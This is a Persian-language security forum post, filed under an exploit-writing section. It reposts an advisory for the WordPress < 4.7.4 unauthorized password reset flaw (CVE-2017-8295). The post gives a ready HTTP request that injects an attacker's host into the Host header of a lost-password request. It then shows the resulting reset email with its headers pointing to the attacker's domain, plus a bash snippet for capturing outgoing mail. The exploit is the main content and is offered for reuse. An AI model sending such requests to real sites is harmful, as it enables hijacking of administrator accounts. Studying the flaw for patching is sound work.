صفحه در حال بارگزاری
لطفا صبر کنید ...

WordPress < 4.7.4 - Unauthorized Password Reset
صفحه اول سایت ارتباط با ما لیست اعضا صفحه اصلی

اطلاعات نشان ميدهد که شما هنوز عضو اين انجمن نيستيد ...و براي استفاده از امکانات انجمن بايد عضو شويد
براي عضويت سريع اينجا کليک کنيد
عضويت شما در تالار 30 ثانيه طول خواهد کشيد

>بستن اين پنجره<

نام کاربری
رمز ورود
یا »عضویت
» رمز عبور را فراموش کردم




صفحه اصلی / نوشتن Exploit کدها، / WordPress < 4.7.4 - Unauthorized Password Reset
Security Forum

ارسال پاسخ
تعداد بازدید 868
WordPress < 4.7.4 - Unauthorized Password Reset
نویسنده پیام

admin آفلاین
ارسال‌ها : 348
عضویت: 5 /1 /1392
تشکرها : 14
تشکر شده : 69
WordPress < 4.7.4 - Unauthorized Password Reset
کد:
- CVE-2017-8295
- Release date: 03.05.2017
- Revision 1.0
- Severity: Medium/High
=============================================

Source: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html

If an attacker sends a request similar to the one below to a default Wordpress
installation that is accessible by the IP address (IP-based vhost):

-----[ HTTP Request ]----

POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: injected-attackers-mxserver.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

user_login=admin&redirect_to=&wp-submit=Get+New+Password

------------------------


Wordpress will trigger the password reset function for the admin user account.

Because of the modified HOST header, the SERVER_NAME will be set to
the hostname of attacker's choice.
As a result, Wordpress will pass the following headers and email body to the
/usr/bin/sendmail wrapper:


------[ resulting e-mail ]-----

Subject: [CompanyX WP] Password Reset
Return-Path: <wordpress@attackers-mxserver.com>
From: WordPress <wordpress@attackers-mxserver.com>
Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com>
X-Priority: 3
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Someone requested that the password be reset for the following account:

http://companyX-wp/wp/wordpress/

Username: admin

If this was a mistake, just ignore this email and nothing will happen.

To reset your password, visit the following address:

<http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin>

-------------------------------


As we can see, fields Return-Path, From, and Message-ID, all have the attacker's
domain set.


The verification of the headers can be performed by replacing /usr/sbin/sendmail with a
bash script of:

#!/bin/bash
cat > /tmp/outgoing-email

امضای admin تشکر نشانه رضایت شماس و حمایت از ما برای ادامه
شنبه 06 خرداد 1396 - 11:50
نقل قول این ارسال در پاسخ گزارش این ارسال به یک مدیر
تشکر شده:
ارسال پاسخ



برای ارسال پاسخ ابتدا باید لوگین یا ثبت نام کنید.



پرش به انجمن :

Security Forum


تماس با ما | WordPress < 4.7.4 - Unauthorized Password Reset | بازگشت به بالا | بازگشت به محتوا | پیوند سایتی RSS


Powered by RozBlog.Com, © 2002-2012
Theme Translation to MyBB by B.Rahmani
Translation to Rozblog : Pcramz.rzb.ir
Theme design by Majid Online